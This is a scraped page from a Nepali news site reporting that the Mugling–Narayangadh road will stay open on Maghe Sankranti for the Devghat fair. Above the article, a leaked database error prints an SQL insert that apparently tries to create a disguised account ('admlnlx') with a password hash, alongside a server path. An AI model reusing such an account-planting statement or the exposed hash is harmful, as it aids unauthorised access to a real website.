WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPAMvT4ripwiKmCthXgXH16SJ2IDZr.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:13:09', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
माघे संक्रान्तिमा मुग्लिन-नारायणगढ सडक बन्द नहुने – Gaule Khabar

माघे संक्रान्तिमा मुग्लिन-नारायणगढ सडक बन्द नहुने

माघे संक्रान्तिमा मुग्लिन-नारायणगढ सडक बन्द नहुने

चितवन,पुस २९-

मुग्लिन-नारायणगढ सडक माघ एक गते बन्द नहुने भएको छ । पवित्र धार्मिक तिर्थस्थल देवघाटमा लाग्ने माघे संक्रान्ति मेलालाई मध्यनजर गर्दै यातायात आवागमन बन्द नगरिने नारायणगढ-मुग्लीन सडक आयोजनाले जनाएको छ ।

नारायणगढ-मुग्लीन सडकखण्ड बिस्तारको काम भइरहेकाले यसअघि साढे १० बजेदेखि ३ बजेसम्म नियमित रुपमा बन्द गरिन्थ्यो ।माघ एक गते एक दिन खुल्ला राखेर माघ दुई गतेदेखि पुनः सडक बन्द गरेर काम गरिने आयोजनाका इञ्जिनियर शिब खनालले जानकारी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका